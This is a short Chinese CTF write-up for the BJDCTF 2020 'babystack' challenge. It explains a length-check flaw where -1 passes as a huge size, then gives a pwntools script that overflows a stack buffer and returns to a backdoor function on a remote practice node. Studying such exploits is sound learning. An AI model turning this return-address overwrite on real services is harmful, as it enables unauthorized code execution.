当前位置: 首页 > article >正文

[BJDCTF 2020]babystack-好久不见9

article 2024/12/30 2:44:37

64位,开启了nx保护

buf[12]的大小是10

后门

‘-1’是极大的

from pwn import *
r = remote("node4.anna.nssctf.cn",28705)
r.recvuntil(b"your name:")
r.sendline("-1")
r.recvuntil(b"name?")
payload = b'M' * (0x10 + 8) + p64(0x04006E6)
r.sendline(payload)
r.interactive()


http://www.kler.cn/a/377698.html

相关文章:

  • logback之pattern详解以及源码分析
  • 作业帮基于 Apache DolphinScheduler 3_0_0 的缺陷修复与优化
  • 【最新】沃德协会管理系统源码+uniapp前端+环境教程
  • elementUI——upload限制图片或者文件只能上传一个——公开版
  • FPGA三模冗余TMR工具(二)
  • 【unity c#】深入理解string,以及不同方式构造类与反射的性能测试(基于BenchmarkDotNet)
  • Web API中的requestAnimationFrame
  • 基于深度学习的自主飞行器导航
  • RHCE——笔记
  • FPGA技术优势
  • Linux——Ubuntu的基础操作
  • .tags > * 直接子选择器的使用
  • Docker篇(安装容器)
  • 力扣每日一题 3226. 使两个整数相等的位更改次数
  • 建设NFS服务器并实现文件共享
  • 校园社团信息管理:Spring Boot技术的应用与挑战
  • 【系统设计】让 Java “动起来”:动态语言与静态语言的比较及 DSL 实现
  • 继承【C++】
  • Linux入门(2)
  • OpenAI Swarm:多智能体编排框架
  • mysql通过sql语句手动关闭连接
  • rnn/lstm
  • java的批量update
  • SQL,力扣题目1549,每件商品的最新订单【窗口函数】
  • 实现GUI界面中的logo图片的编码与隐藏
  • 基于vue3和elementPlus的el-tree组件,实现树结构穿梭框,支持数据回显和懒加载